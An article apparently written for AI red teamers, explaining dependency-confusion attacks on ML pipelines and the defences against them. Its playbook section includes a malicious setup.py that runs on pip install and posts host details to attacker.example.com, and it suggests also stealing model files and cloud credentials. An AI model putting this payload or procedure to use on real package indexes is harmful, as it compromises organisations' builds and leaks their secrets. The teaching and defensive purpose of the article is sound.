Your ML pipeline’s build script faithfully executes pip install -r requirements.txt. One of the lines is my-internal-data-preprocessor==1.2. This package lives on your company’s private PyPI server. What happens if an attacker uploads a package named my-internal-data-preprocessor with a higher version, say 99.9.9, to the public PyPI repository? This simple question exposes a critical vulnerability in the software supply chain that directly impacts AI systems.
The Ambiguity at the Heart of the Attack
Dependency confusion, also known as a namespace confusion attack, exploits the package resolution logic of modern package managers like pip, npm, and Maven. Many development environments are configured to search multiple repositories—typically a private, internal one for proprietary code and a public one for open-source libraries.
The vulnerability arises when a package manager is asked to fetch a dependency that exists, or could exist, in both places. If the resolution logic is not explicitly configured to prioritize the private repository or if it favors the package with the highest version number regardless of its source, it can be tricked into downloading a malicious package from the public repository instead of the legitimate internal one.
The AI Supply Chain Attack Surface
While dependency confusion affects all software development, it poses unique risks to AI and machine learning pipelines. The attack surface isn’t just a web server; it’s the entire MLOps lifecycle.
- Training Environment Compromise: A malicious package installed during training can access sensitive training data, steal cloud credentials (like AWS keys or Azure service principal secrets), or exfiltrate proprietary model architectures.
- Subtle Model Poisoning: A more sophisticated payload could do more than just steal secrets. It could manipulate the data loader to inject a handful of poisoned samples into the training batch, creating a subtle backdoor in the final model that is extremely difficult to detect. For example, it could alter a matrix multiplication function to behave differently for a specific trigger.
- Inference-Time Attacks: If the dependency is part of the model’s runtime environment, the malicious code could log inference requests and their outputs, stealing sensitive user data processed by the model. It could also manipulate model predictions for specific inputs, causing targeted failures.
- Intellectual Property Theft: A compromised dependency can serialize and exfiltrate a fully trained model, which often represents significant financial and computational investment.
Red Team Playbook: Executing a Dependency Confusion Attack
As a red teamer, your goal is to demonstrate this risk. The process is straightforward but requires careful reconnaissance.
Step 1: Discover Internal Package Names
You need to find the names of proprietary, internal packages that are not meant to be public. These are your targets.
- Code Repositories: Scan the organization’s public and private code repositories (e.g., GitHub, GitLab) for files like
requirements.txt,setup.py,pyproject.toml, orpackage.json. - Leaked Configuration: Search for build scripts, Dockerfiles, or CI/CD configuration files (e.g.,
.gitlab-ci.yml) that may have been accidentally exposed. These often contain installation commands revealing internal package names. - Public Mentions: Sometimes developers mention internal tools or libraries in public forums, blog posts, or conference talks.
Step 2: Craft and Publish the Malicious Package
Once you have a list of candidate package names, check if they are available on public repositories like PyPI or npm. If a name is available, you can claim it.
Your package should have a very high version number (e.g., 99.9.9) to ensure it’s chosen by the package manager. The payload is typically placed in the package’s setup script (setup.py for Python) or an initialization file, so it executes automatically upon installation.
# Malicious setup.py for a Python package from setuptools import setup, find_packages import os import socket import requests # This code runs on 'pip install' try: hostname = socket.gethostname() user = os.getenv("USER") cwd = os.getcwd() # Exfiltrate basic info to an attacker-controlled server payload = {'hostname': hostname, 'user': user, 'cwd': cwd} requests.post("https://attacker.example.com/collector", json=payload) except Exception: # Fail silently if anything goes wrong pass setup( name='my-corp-internal-data-preprocessor', # The discovered internal package name version='99.9.9', # A very high version number packages=find_packages(), description='A legitimate-looking but malicious package.' )
In an AI context, the payload could be adapted to find and exfiltrate files ending in .pt, .h5, or .pkl, or to read environment variables prefixed with AWS_ or MLFLOW_.
Step 3: Wait and Monitor
After publishing, the final step is to wait for an automated build system, a developer’s machine, or a CI/CD pipeline within the target organization to pull and install your package. Monitor your collection server for incoming data.
Defensive Strategies and Mitigation
Preventing dependency confusion requires enforcing strict controls over how your systems resolve and fetch software packages. Relying on default configurations is a recipe for compromise.
| Defense Mechanism | Description | Example (Python/pip) |
|---|---|---|
| Scope Package Names | Use namespaces or prefixes for all internal packages (e.g., mycorp-). This makes accidental name collisions with public packages less likely. |
Package name: mycorp-data-preprocessor |
| Explicit Index URL | Configure package managers to use only your private repository. This is the most effective defense but can complicate fetching public packages. | pip install --index-url https://private-pypi.mycorp.com/simple/ ... |
| Use a Proxy Repository | Set up a repository manager (like Nexus or Artifactory) that acts as a proxy. It serves approved, cached public packages and your private packages from a single, trusted source. | All pip requests point to one internal proxy URL. |
| Version Pinning | Pin exact versions of all dependencies (e.g., my-corp-lib==1.2.3). While this doesn’t prevent the attack if the package is fetched for the first time, it stops unexpected upgrades to a malicious version. |
requirements.lock or poetry.lock file. |
| Client-Side Verification | Use features like pip’s hash-checking mode to verify that the downloaded package matches a known-good cryptographic hash. | pip install -r requirements.txt --require-hashes |
For AI red teamers, encountering these defenses changes the game. Your focus shifts from a simple upload to finding gaps in these configurations. Is there one legacy build server that doesn’t use the proxy? Can you find a developer machine with a misconfigured client? The battle moves from the public internet to the intricacies of the target’s internal MLOps infrastructure.